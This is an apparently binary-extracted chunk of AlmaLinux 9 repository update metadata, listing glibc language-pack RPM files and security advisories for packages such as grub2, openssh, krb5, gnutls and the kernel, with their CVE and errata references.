5.8.alma.1.x86_64.rpm�glibc-langpack-nds-2.34-125.el9_5.8.alma.1.x86_64.rpm�	glibc-langpack-ne-2.34-125.el9_5.8.alma.1.x86_64.rpm�sglibc-langpack-lv-2.34-125.el9_5.8.alma.1.x86_64.rpm�)glibc-langpack-ca-2.34-125.el9_5.8.alma.1.x86_64.rpm�Tglibc-langpack-zh-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-bg-2.34-125.el9_5.8.alma.1.x86_64.rpm�Gglibc-langpack-ur-2.34-125.el9_5.8.alma.1.x86_64.rpm�;glibc-langpack-tig-2.34-125.el9_5.8.alma.1.x86_64.rpm�aglibc-langpack-kab-2.34-125.el9_5.8.alma.1.x86_64.rpm�"glibc-langpack-bi-2.34-125.el9_5.8.alma.1.x86_64.rpm�jglibc-langpack-kw-2.34-125.el9_5.8.alma.1.x86_64.rpm�Pglibc-langpack-yi-2.34-125.el9_5.8.alma.1.x86_64.rpm�hglibc-langpack-ks-2.34-125.el9_5.8.alma.1.x86_64.rpm�Bglibc-langpack-fil-2.34-125.el9_5.8.alma.1.x86_64.rpm�Lglibc-langpack-wae-2.34-125.el9_5.8.alma.1.x86_64.rpm�!glibc-langpack-bho-2.34-125.el9_5.8.alma.1.x86_64.rpm�Sglibc-langpack-yuw-2.34-125.el9_5.8.alma.1.x86_64.rpm�9glibc-langpack-the-2.34-125.el9_5.8.alma.1.x86_64.rpm�5glibc-langpack-doi-2.34-125.el9_5.8.alma.1.x86_64.rpm�Zglibc-langpack-ig-2.34-125.el9_5.8.alma.1.x86_64.rpm�7glibc-langpack-dv-2.34-125.el9_5.8.alma.1.x86_64.rpm�Vglibc-minimal-langpack-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-an-2.34-125.el9_5.8.alma.1.x86_64.rpm�rglibc-langpack-lt-2.34-125.el9_5.8.alma.1.x86_64.rpm�.glibc-langpack-crh-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-nan-2.34-125.el9_5.8.alma.1.x86_64.rpm�^glibc-langpack-iu-2.34-125.el9_5.8.alma.1.x86_64.rpm�xglibc-langpack-mg-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-or-2.34-125.el9_5.8.alma.1.x86_64.rpm�?glibc-langpack-fa-2.34-125.el9_5.8.alma.1.x86_64.rpm�$glibc-langpack-sgs-2.34-125.el9_5.8.alma.1.x86_64.rpm�
glibc-langpack-nhn-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-pl-2.34-125.el9_5.8.alma.1.x86_64.rpm�iglibc-langpack-ku-2.34-125.el9_5.8.alma.1.x86_64.rpm�]glibc-langpack-it-2.34-125.el9_5.8.alma.1.x86_64.rpm�cglibc-langpack-kl-2.34-125.el9_5.8.alma.1.x86_64.rpm�8glibc-langpack-dz-2.34-125.el9_5.8.alma.1.x86_64.rpm�P�4glibc-langpack-de-2.34-125.el9_5.8.alma.1.x86_64.rpm�(glibc-langpack-sid-2.34-125.el9_5.8.alma.1.x86_64.rpm�4glibc-langpack-ta-2.34-125.el9_5.8.alma.1.x86_64.rpm�.glibc-langpack-sr-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-ak-2.34-125.el9_5.8.alma.1.x86_64.rpm�Jglibc-langpack-vi-2.34-125.el9_5.8.alma.1.x86_64.rpm�%glibc-langpack-shn-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-ru-2.34-125.el9_5.8.alma.1.x86_64.rpm�3glibc-langpack-da-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-oc-2.34-125.el9_5.8.alma.1.x86_64.rpm�Sglibc-langpack-hr-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-ar-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-pa-2.34-125.el9_5.8.alma.1.x86_64.rpm�Gglibc-langpack-ga-2.34-125.el9_5.8.alma.1.x86_64.rpm�nglibc-langpack-li-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-ms-2.34-125.el9_5.8.alma.1.x86_64.rpm�@glibc-langpack-tpi-2.34-125.el9_5.8.alma.1.x86_64.rpm�Bglibc-langpack-ts-2.34-125.el9_5.8.alma.1.x86_64.rpm�,glibc-2.34-125.el9_5.8.alma.1.x86_64.rpm�~glibc-langpack-ml-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-ayc-2.34-125.el9_5.8.alma.1.x86_64.rpm�=glibc-langpack-et-2.34-125.el9_5.8.alma.1.x86_64.rpm�Hglibc-langpack-uz-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-nr-2.34-125.el9_5.8.alma.1.x86_64.rpm�wglibc-langpack-mfe-2.34-125.el9_5.8.alma.1.x86_64.rpm�Tglibc-langpack-hsb-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-mr-2.34-125.el9_5.8.alma.1.x86_64.rpm�Uglibc-langpack-zu-2.34-125.el9_5.8.alma.1.x86_64.rpm�Jglibc-langpack-gl-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-niu-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-mn-2.34-125.el9_5.8.alma.1.x86_64.rpm�/glibc-langpack-cs-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-mt-2.34-125.el9_5.8.alma.1.x86_64.rpm�1glibc-langpack-cv-2.34-125.el9_5.8.alma.1.x86_64.rpm�uglibc-langpack-mag-2.34-125.el9_5.8.alma.1.x86_64.rpm�=glibc-langpack-tl-2.34-125.el9_5.8.alma.1.x86_64.rpm�,glibc-2.34-125.el9_5.8.alma.1.i686.rpm�'glibc-langpack-bs-2.34-125.el9_5.8.alma.1.x86_64.rpm�Nglibc-langpack-wo-2.34-125.el9_5.8.alma.1.x86_64.rpm�<glibc-langpack-es-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-mni-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-aa-2.34-125.el9_5.8.alma.1.x86_64.rpm�Xglibc-langpack-ia-2.34-125.el9_5.8.alma.1.x86_64.rpm�@glibc-langpack-ff-2.34-125.el9_5.8.alma.1.x86_64.rpm�Eglibc-langpack-uk-2.34-125.el9_5.8.alma.1.x86_64.rpm�'glibc-langpack-si-2.34-125.el9_5.8.alma.1.x86_64.rpm�0glibc-langpack-csb-2.34-125.el9_5.8.alma.1.x86_64.rpm�bglibc-langpack-kk-2.34-125.el9_5.8.alma.1.x86_64.rpm�0glibc-langpack-st-2.34-125.el9_5.8.alma.1.x86_64.rpm�Rglibc-langpack-yue-2.34-125.el9_5.8.alma.1.x86_64.rpm�gglibc-langpack-kok-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-os-2.34-125.el9_5.8.alma.1.x86_64.rpm�Oglibc-langpack-he-2.34-125.el9_5.8.alma.1.x86_64.rpm�*glibc-langpack-sl-2.34-125.el9_5.8.alma.1.x86_64.rpm�kglibc-langpack-ky-2.34-125.el9_5.8.alma.1.x86_64.rpm�,glibc-langpack-ckb-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-sah-2.34-125.el9_5.8.alma.1.x86_64.rpm�pglibc-langpack-ln-2.34-125.el9_5.8.alma.1.x86_64.rpm�Nglibc-langpack-hak-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-ber-2.34-125.el9_5.8.alma.1.x86_64.rpm�8glibc-langpack-th-2.34-125.el9_5.8.alma.1.x86_64.rpm�zglibc-langpack-mi-2.34-125.el9_5.8.alma.1.x86_64.rpm�Kglibc-langpack-wa-2.34-125.el9_5.8.alma.1.x86_64.rpm�-glibc-gconv-extra-2.34-125.el9_5.8.alma.1.i686.rpm�Wnscd-2.34-125.el9_5.8.alma.1.x86_64.rpm�Pglibc-langpack-hi-2.34-125.el9_5.8.alma.1.x86_64.rpm�Aglibc-langpack-fi-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-sa-2.34-125.el9_5.8.alma.1.x86_64.rpm�!glibc-langpack-sc-2.34-125.el9_5.8.alma.1.x86_64.rpm�mglibc-langpack-lg-2.34-125.el9_5.8.alma.1.x86_64.rpm�(glibc-langpack-byn-2.34-125.el9_5.8.alma.1.x86_64.rpm�Cglibc-langpack-tt-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-pap-2.34-125.el9_5.8.alma.1.x86_64.rpm� glibc-langpack-sat-2.34-125.el9_5.8.alma.1.x86_64.rpm�Iglibc-langpack-ve-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-rw-2.34-125.el9_5.8.alma.1.x86_64.rpm�+glibc-langpack-chr-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-bem-2.34-125.el9_5.8.alma.1.x86_64.rpm�oglibc-langpack-lij-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-common-2.34-125.el9_5.8.alma.1.x86_64.rpm�1glibc-langpack-sv-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-ro-2.34-125.el9_5.8.alma.1.x86_64.rpm�Vglibc-langpack-hu-2.34-125.el9_5.8.alma.1.x86_64.rpm�Mglibc-langpack-ha-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-ps-2.34-125.el9_5.8.alma.1.x86_64.rpm�>glibc-langpack-tn-2.34-125.el9_5.8.alma.1.x86_64.rpm�Dglibc-langpack-ug-2.34-125.el9_5.8.alma.1.x86_64.rpm�lglibc-langpack-lb-2.34-125.el9_5.8.alma.1.x86_64.rpm�<glibc-langpack-tk-2.34-125.el9_5.8.alma.1.x86_64.rpm�Fglibc-langpack-fy-2.34-125.el9_5.8.alma.1.x86_64.rpm�-glibc-langpack-cmn-2.34-125.el9_5.8.alma.1.x86_64.rpm�6glibc-langpack-dsb-2.34-125.el9_5.8.alma.1.x86_64.rpm�eglibc-langpack-kn-2.34-125.el9_5.8.alma.1.x86_64.rpm�&glibc-langpack-brx-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-mnw-2.34-125.el9_5.8.alma.1.x86_64.rpm�
glibc-langpack-nn-2.34-125.el9_5.8.alma.1.x86_64.rpm�>glibc-langpack-eu-2.34-125.el9_5.8.alma.1.x86_64.rpm�Cglibc-langpack-fo-2.34-125.el9_5.8.alma.1.x86_64.rpm�Yglibc-langpack-id-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-ast-2.34-125.el9_5.8.alma.1.x86_64.rpm�9glibc-langpack-el-2.34-125.el9_5.8.alma.1.x86_64.rpm�+glibc-langpack-sm-2.34-125.el9_5.8.alma.1.x86_64.rpm�Kglibc-langpack-gu-2.34-125.el9_5.8.alma.1.x86_64.rpm�dglibc-langpack-km-2.34-125.el9_5.8.alma.1.x86_64.rpm�Qglibc-langpack-yo-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-om-2.34-125.el9_5.8.alma.1.x86_64.rpm�/libnsl-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-nb-2.34-125.el9_5.8.alma.1.x86_64.rpm�Qglibc-langpack-hif-2.34-125.el9_5.8.alma.1.x86_64.rpm�:glibc-langpack-ti-2.34-125.el9_5.8.alma.1.x86_64.rpm�}glibc-langpack-mk-2.34-125.el9_5.8.alma.1.x86_64.rpm�/libnsl-2.34-125.el9_5.8.alma.1.i686.rpm�glibc-langpack-agr-2.34-125.el9_5.8.alma.1.x86_64.rpm�Uglibc-langpack-ht-2.34-125.el9_5.8.alma.1.x86_64.rpm�&glibc-langpack-shs-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-nl-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-quz-2.34-125.el9_5.8.alma.1.x86_64.rpm�Hglibc-langpack-gd-2.34-125.el9_5.8.alma.1.x86_64.rpm�-glibc-langpack-sq-2.34-125.el9_5.8.alma.1.x86_64.rpm�`glibc-langpack-ka-2.34-125.el9_5.8.alma.1.x86_64.rpm�$glibc-langpack-bo-2.34-125.el9_5.8.alma.1.x86_64.rpm�;glibc-langpack-eo-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-anp-2.34-125.el9_5.8.alma.1.x86_64.rpm�:glibc-langpack-en-2.34-125.el9_5.8.alma.1.x86_64.rpm�?glibc-langpack-to-2.34-125.el9_5.8.alma.1.x86_64.rpm�Wglibc-langpack-hy-2.34-125.el9_5.8.alma.1.x86_64.rpm�fglibc-langpack-ko-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-my-2.34-125.el9_5.8.alma.1.x86_64.rpm�Mglibc-langpack-wal-2.34-125.el9_5.8.alma.1.x86_64.rpm�5glibc-langpack-tcy-2.34-125.el9_5.8.alma.1.x86_64.rpm�6glibc-langpack-te-2.34-125.el9_5.8.alma.1.x86_64.rpm�%glibc-langpack-br-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-be-2.34-125.el9_5.8.alma.1.x86_64.rpm�Rglibc-langpack-hne-2.34-125.el9_5.8.alma.1.x86_64.rpm�Iglibc-langpack-gez-2.34-125.el9_5.8.alma.1.x86_64.rpm�3glibc-langpack-szl-2.34-125.el9_5.8.alma.1.x86_64.rpm�#glibc-langpack-bn-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-pt-2.34-125.el9_5.8.alma.1.x86_64.rpm�#glibc-langpack-se-2.34-125.el9_5.8.alma.1.x86_64.rpm�\glibc-langpack-is-2.34-125.el9_5.8.alma.1.x86_64.rpm�Oglibc-langpack-xh-2.34-125.el9_5.8.alma.1.x86_64.rpm�,glibc-langpack-so-2.34-125.el9_5.8.alma.1.x86_64.rpm�tglibc-langpack-lzh-2.34-125.el9_5.8.alma.1.x86_64.rpm�7glibc-langpack-tg-2.34-125.el9_5.8.alma.1.x86_64.rpm�|glibc-langpack-mjw-2.34-125.el9_5.8.alma.1.x86_64.rpm�*glibc-langpack-ce-2.34-125.el9_5.8.alma.1.x86_64.rpm�yglibc-langpack-mhr-2.34-125.el9_5.8.alma.1.x86_64.rpm�[glibc-langpack-ik-2.34-125.el9_5.8.alma.1.x86_64.rpm�-glibc-gconv-extra-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-raj-2.34-125.el9_5.8.alma.1.x86_64.rpm�Dglibc-langpack-fr-2.34-125.el9_5.8.alma.1.x86_64.rpm�_glibc-langpack-ja-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-az-2.34-125.el9_5.8.alma.1.x86_64.rpm� glibc-langpack-bhb-2.34-125.el9_5.8.alma.1.x86_64.rpm�qglibc-langpack-lo-2.34-125.el9_5.8.alma.1.x86_64.rpm�/glibc-langpack-ss-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-am-2.34-125.el9_5.8.alma.1.x86_64.rpm�Aglibc-langpack-tr-2.34-125.el9_5.8.alma.1.x86_64.rpm�2glibc-langpack-cy-2.34-125.el9_5.8.alma.1.x86_64.rpm�)glibc-langpack-sk-2.34-125.el9_5.8.alma.1.x86_64.rpm�Lglibc-langpack-gv-2.34-125.el9_5.8.alma.1.x86_64.rpm�vglibc-langpack-mai-2.34-125.el9_5.8.alma.1.x86_64.rpm�"glibc-langpack-sd-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-as-2.34-125.el9_5.8.alma.1.x86_64.rpm�2glibc-langpack-sw-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-nso-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-all-langpacks-2.34-125.el9_5.8.alma.1.x86_64.rpm�Fglibc-langpack-unm-2.34-125.el9_5.8.alma.1.x86_64.rpm�{glibc-langpack-miq-2.34-125.el9_5.8.alma.1.x86_64.rpm�Eglibc-langpack-fur-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-af-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-nds-2.34-125.el9_5.8.alma.1.x86_64.rpm�	glibc-langpack-ne-2.34-125.el9_5.8.alma.1.x86_64.rpm�sglibc-langpack-lv-2.34-125.el9_5.8.alma.1.x86_64.rpm�)glibc-langpack-ca-2.34-125.el9_5.8.alma.1.x86_64.rpm�Tglibc-langpack-zh-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-bg-2.34-125.el9_5.8.alma.1.x86_64.rpm�Gglibc-langpack-ur-2.34-125.el9_5.8.alma.1.x86_64.rpm�;glibc-langpack-tig-2.34-125.el9_5.8.alma.1.x86_64.rpm�aglibc-langpack-kab-2.34-125.el9_5.8.alma.1.x86_64.rpm�"glibc-langpack-bi-2.34-125.el9_5.8.alma.1.x86_64.rpm�jglibc-langpack-kw-2.34-125.el9_5.8.alma.1.x86_64.rpm�Pglibc-langpack-yi-2.34-125.el9_5.8.alma.1.x86_64.rpm�hglibc-langpack-ks-2.34-125.el9_5.8.alma.1.x86_64.rpm�Bglibc-langpack-fil-2.34-125.el9_5.8.alma.1.x86_64.rpm�Lglibc-langpack-wae-2.34-125.el9_5.8.alma.1.x86_64.rpm�!glibc-langpack-bho-2.34-125.el9_5.8.alma.1.x86_64.rpm�Sglibc-langpack-yuw-2.34-125.el9_5.8.alma.1.x86_64.rpm�9glibc-langpack-the-2.34-125.el9_5.8.alma.1.x86_64.rpm�5glibc-langpack-doi-2.34-125.el9_5.8.alma.1.x86_64.rpm�Zglibc-langpack-ig-2.34-125.el9_5.8.alma.1.x86_64.rpm�7glibc-langpack-dv-2.34-125.el9_5.8.alma.1.x86_64.rpm�Vglibc-minimal-langpack-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-an-2.34-125.el9_5.8.alma.1.x86_64.rpm�rglibc-langpack-lt-2.34-125.el9_5.8.alma.1.x86_64.rpm�.glibc-langpack-crh-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-nan-2.34-125.el9_5.8.alma.1.x86_64.rpm�^glibc-langpack-iu-2.34-125.el9_5.8.alma.1.x86_64.rpm�xglibc-langpack-mg-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-or-2.34-125.el9_5.8.alma.1.x86_64.rpm�?glibc-langpack-fa-2.34-125.el9_5.8.alma.1.x86_64.rpm�$glibc-langpack-sgs-2.34-125.el9_5.8.alma.1.x86_64.rpm�
glibc-langpack-nhn-2.34-125.el9_5.8.alma.1.x86_64.rpm�glibc-langpack-pl-2.34-125.el9_5.8.alma.1.x86_64.rpm�iglibc-langpack-ku-2.34-125.el9_5.8.alma.1.x86_64.rpm�]glibc-langpack-it-2.34-125.el9_5.8.alma.1.x86_64.rpm�cglibc-langpack-kl-2.34-125.el9_5.8.alma.1.x86_64.rpm�8glibc-langpack-dz-2.34-125.el9_5.8.alma.1.x86_64.rpm����r�M
�
�TBBBsecurityModerate: python3.9 security update&��r�[https://access.redhat.com/errata/RHSA-2025:6977RHSA-2025:6977RHSA-2025:6977https://access.redhat.com/security/cve/CVE-2025-0938CVE-2025-0938CVE-2025-0938https://bugzilla.redhat.com/23432372343237https://errata.almalinux.org/9/ALSA-2025-6977.htmlALSA-2025:6977ALSA-2025:6977-�python3-libs-3.9.21-2.el9.i686.rpm��python3-3.9.21-2.el9.x86_64.rpm-�python3-libs-3.9.21-2.el9.x86_64.rpm-�python3-libs-3.9.21-2.el9.i686.rpm��python3-3.9.21-2.el9.x86_64.rpm-�python3-libs-3.9.21-2.el9.x86_64.rpm��p�N
�+�YBBBBBBBBBBBBBBBBsecurityModerate: grub2 security update&��M� https://access.redhat.com/errata/RHSA-2025:6990RHSA-2025:6990RHSA-2025:6990https://access.redhat.com/security/cve/CVE-2024-45774CVE-2024-45774CVE-2024-45774https://access.redhat.com/security/cve/CVE-2024-45775CVE-2024-45775CVE-2024-45775https://access.redhat.com/security/cve/CVE-2024-45776CVE-2024-45776CVE-2024-45776https://access.redhat.com/security/cve/CVE-2024-45781CVE-2024-45781CVE-2024-45781https://access.redhat.com/security/cve/CVE-2024-45783CVE-2024-45783CVE-2024-45783https://access.redhat.com/security/cve/CVE-2025-0622CVE-2025-0622CVE-2025-0622https://access.redhat.com/security/cve/CVE-2025-0677CVE-2025-0677CVE-2025-0677https://access.redhat.com/security/cve/CVE-2025-0690CVE-2025-0690CVE-2025-0690https://bugzilla.redhat.com/23374612337461https://bugzilla.redhat.com/23374812337481https://bugzilla.redhat.com/23391822339182https://bugzilla.redhat.com/23458572345857https://bugzilla.redhat.com/23458632345863https://bugzilla.redhat.com/23458652345865https://bugzilla.redhat.com/23461162346116https://bugzilla.redhat.com/23461232346123https://errata.almalinux.org/9/ALSA-2025-6990.htmlALSA-2025:6990ALSA-2025:6990�<�grub2-common-2.06-104.el9_6.alma.1.noarch.rpm�k�grub2-pc-2.06-104.el9_6.alma.1.x86_64.rpm�m�grub2-tools-efi-2.06-104.el9_6.alma.1.x86_64.rpm�i�grub2-efi-x64-2.06-104.el9_6.alma.1.x86_64.rpm�o�grub2-tools-minimal-2.06-104.el9_6.alma.1.x86_64.rpm�=�grub2-efi-aa64-modules-2.06-104.el9_6.alma.1.noarch.rpm�j�grub2-efi-x64-cdboot-2.06-104.el9_6.alma.1.x86_64.rpm�n�grub2-tools-extra-2.06-104.el9_6.alma.1.x86_64.rpm�>�grub2-efi-x64-modules-2.06-104.el9_6.alma.1.noarch.rpm�l�grub2-tools-2.06-104.el9_6.alma.1.x86_64.rpm�?�grub2-pc-modules-2.06-104.el9_6.alma.1.noarch.rpm�<�grub2-common-2.06-104.el9_6.alma.1.noarch.rpm�k�grub2-pc-2.06-104.el9_6.alma.1.x86_64.rpm�m�grub2-tools-efi-2.06-104.el9_6.alma.1.x86_64.rpm�i�grub2-efi-x64-2.06-104.el9_6.alma.1.x86_64.rpm�o�grub2-tools-minimal-2.06-104.el9_6.alma.1.x86_64.rpm�=�grub2-efi-aa64-modules-2.06-104.el9_6.alma.1.noarch.rpm�j�grub2-efi-x64-cdboot-2.06-104.el9_6.alma.1.x86_64.rpm�n�grub2-tools-extra-2.06-104.el9_6.alma.1.x86_64.rpm�>�grub2-efi-x64-modules-2.06-104.el9_6.alma.1.noarch.rpm�l�grub2-tools-2.06-104.el9_6.alma.1.x86_64.rpm�?�grub2-pc-modules-2.06-104.el9_6.alma.1.noarch.rpm��|�O
��lBBBBBBsecurityModerate: openssh security update&��m�https://access.redhat.com/errata/RHSA-2025:6993RHSA-2025:6993RHSA-2025:6993https://access.redhat.com/security/cve/CVE-2025-26465CVE-2025-26465CVE-2025-26465https://bugzilla.redhat.com/23447802344780https://errata.almalinux.org/9/ALSA-2025-6993.htmlALSA-2025:6993ALSA-2025:6993�q�{openssh-8.7p1-45.el9.x86_64.rpm�t�{openssh-server-8.7p1-45.el9.x86_64.rpm�r�{openssh-clients-8.7p1-45.el9.x86_64.rpm�s�{openssh-keycat-8.7p1-45.el9.x86_64.rpm�q�{openssh-8.7p1-45.el9.x86_64.rpm�t�{openssh-server-8.7p1-45.el9.x86_64.rpm�r�{openssh-clients-8.7p1-45.el9.x86_64.rpm�s�{openssh-keycat-8.7p1-45.el9.x86_64.rpm�‡�|�P
�5�4securityModerate: microcode_ctl security update&��m�Lhttps://access.redhat.com/errata/RHSA-2025:7043RHSA-2025:7043RHSA-2025:7043https://access.redhat.com/security/cve/CVE-2024-28047CVE-2024-28047CVE-2024-28047https://access.redhat.com/security/cve/CVE-2024-31157CVE-2024-31157CVE-2024-31157https://access.redhat.com/security/cve/CVE-2024-39279CVE-2024-39279CVE-2024-39279https://bugzilla.redhat.com/23453632345363https://bugzilla.redhat.com/23453812345381https://bugzilla.redhat.com/23454212345421https://errata.almalinux.org/9/ALSA-2025-7043.htmlALSA-2025:7043ALSA-2025:7043�r�microcode_ctl-20250211-1.el9_6.noarch.rpm�r�microcode_ctl-20250211-1.el9_6.noarch.rpm���Q
��6securityModerate: python-requests security update&��9�`https://access.redhat.com/errata/RHSA-2025:7049RHSA-2025:7049RHSA-2025:7049https://access.redhat.com/security/cve/CVE-2024-35195CVE-2024-35195CVE-2024-35195https://bugzilla.redhat.com/22821142282114https://errata.almalinux.org/9/ALSA-2025-7049.htmlALSA-2025:7049ALSA-2025:7049�I�python3-requests-2.25.1-9.el9.noarch.rpm�I�python3-requests-2.25.1-9.el9.noarch.rpm��"�R
��wsecurityModerate: rsync security update&���`https://access.redhat.com/errata/RHSA-2025:7050RHSA-2025:7050RHSA-2025:7050https://access.redhat.com/security/cve/CVE-2024-12087CVE-2024-12087CVE-2024-12087https://access.redhat.com/security/cve/CVE-2024-12088CVE-2024-12088CVE-2024-12088https://access.redhat.com/security/cve/CVE-2024-12747CVE-2024-12747CVE-2024-12747https://bugzilla.redhat.com/23306722330672https://bugzilla.redhat.com/23306762330676https://bugzilla.redhat.com/23329682332968https://errata.almalinux.org/9/ALSA-2025-7050.htmlALSA-2025:7050ALSA-2025:7050�=�,rsync-3.2.5-3.el9.x86_64.rpm�=�,rsync-3.2.5-3.el9.x86_64.rpm��+�S
�;�ysecurityModerate: iptraf-ng security update&��y�Hhttps://access.redhat.com/errata/RHSA-2025:7064RHSA-2025:7064RHSA-2025:7064https://access.redhat.com/security/cve/CVE-2024-52949CVE-2024-52949CVE-2024-52949https://bugzilla.redhat.com/23327022332702https://errata.almalinux.org/9/ALSA-2025-7064.htmlALSA-2025:7064ALSA-2025:7064�`�iptraf-ng-1.2.2-1.el9.x86_64.rpm�`�iptraf-ng-1.2.2-1.el9.x86_64.rpm��E�T
��|BBBBBBBBBBBBBBBsecurityModerate: krb5 security update&��A�{https://access.redhat.com/errata/RHSA-2025:7067RHSA-2025:7067RHSA-2025:7067https://access.redhat.com/security/cve/CVE-2025-24528CVE-2025-24528CVE-2025-24528https://bugzilla.redhat.com/23427962342796https://errata.almalinux.org/9/ALSA-2025-7067.htmlALSA-2025:7067ALSA-2025:7067�(�libkadm5-1.21.1-6.el9.x86_64.rpm�(�libkadm5-1.21.1-6.el9.i686.rpm�&�krb5-server-1.21.1-6.el9.i686.rpm�%�krb5-pkinit-1.21.1-6.el9.i686.rpm�&�krb5-server-1.21.1-6.el9.x86_64.rpm�%�krb5-pkinit-1.21.1-6.el9.x86_64.rpm�$�krb5-libs-1.21.1-6.el9.i686.rpm�$�krb5-libs-1.21.1-6.el9.x86_64.rpm�'�krb5-server-ldap-1.21.1-6.el9.x86_64.rpm�'�krb5-server-ldap-1.21.1-6.el9.i686.rpm�p�krb5-workstation-1.21.1-6.el9.x86_64.rpm�(�libkadm5-1.21.1-6.el9.x86_64.rpm�(�libkadm5-1.21.1-6.el9.i686.rpm�&�krb5-server-1.21.1-6.el9.i686.rpm�%�krb5-pkinit-1.21.1-6.el9.i686.rpm�&�krb5-server-1.21.1-6.el9.x86_64.rpm�%�krb5-pkinit-1.21.1-6.el9.x86_64.rpm�$�krb5-libs-1.21.1-6.el9.i686.rpm�$�krb5-libs-1.21.1-6.el9.x86_64.rpm�'�krb5-server-ldap-1.21.1-6.el9.x86_64.rpm�'�krb5-server-ldap-1.21.1-6.el9.i686.rpm�p�krb5-workstation-1.21.1-6.el9.x86_64.rpm��l�U
��MBsecurityModerate: gnutls security update&��<�xhttps://access.redhat.com/errata/RHSA-2025:7076RHSA-2025:7076RHSA-2025:7076https://access.redhat.com/security/cve/CVE-2024-12243CVE-2024-12243CVE-2024-12243https://bugzilla.redhat.com/23446152344615https://errata.almalinux.org/9/ALSA-2025-7076.htmlALSA-2025:7076ALSA-2025:7076�#�gnutls-3.8.3-6.el9.x86_64.rpm�#�gnutls-3.8.3-6.el9.i686.rpm�#�gnutls-3.8.3-6.el9.x86_64.rpm�#�gnutls-3.8.3-6.el9.i686.rpm��u�V
��PBsecurityModerate: libtasn1 security update&��4�4https://access.redhat.com/errata/RHSA-2025:7077RHSA-2025:7077RHSA-2025:7077https://access.redhat.com/security/cve/CVE-2024-12133CVE-2024-12133CVE-2024-12133https://bugzilla.redhat.com/23446112344611https://errata.almalinux.org/9/ALSA-2025-7077.htmlALSA-2025:7077ALSA-2025:7077�1�libtasn1-4.16.0-9.el9.x86_64.rpm�1�libtasn1-4.16.0-9.el9.i686.rpm�1�libtasn1-4.16.0-9.el9.x86_64.rpm�1�libtasn1-4.16.0-9.el9.i686.rpm���W
��SBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security update&'��h�@https://access.redhat.com/errata/RHSA-2025:7423RHSA-2025:7423RHSA-2025:7423https://access.redhat.com/security/cve/CVE-2024-58005CVE-2024-58005CVE-2024-58005https://access.redhat.com/security/cve/CVE-2024-58007CVE-2024-58007CVE-2024-58007https://access.redhat.com/security/cve/CVE-2024-58069CVE-2024-58069CVE-2024-58069https://access.redhat.com/security/cve/CVE-2025-21633CVE-2025-21633CVE-2025-21633https://access.redhat.com/security/cve/CVE-2025-21927CVE-2025-21927CVE-2025-21927https://access.redhat.com/security/cve/CVE-2025-21993CVE-2025-21993CVE-2025-21993https://bugzilla.redhat.com/23388132338813https://bugzilla.redhat.com/23485652348565https://bugzilla.redhat.com/23485902348590https://bugzilla.redhat.com/23503642350364https://bugzilla.redhat.com/23565932356593https://bugzilla.redhat.com/23569082356908https://errata.almalinux.org/9/ALSA-2025-7423.htmlALSA-2025:7423ALSA-2025:7423%Pkernel-uki-virt-addons-5.14.0-570.16.1.el9_6.x86_64.rpmPkernel-modules-extra-5.14.0-570.16.1.el9_6.x86_64.rpmPkernel-core-5.14.0-570.16.1.el9_6.x86_64.rpmPkernel-debug-modules-5.14.0-570.16.1.el9_6.x86_64.rpmPkernel-debug-5.14.0-570.16.1.el9_6.x86_64.rpmPkernel-5.14.0-570.16.1.el9_6.x86_64.rpm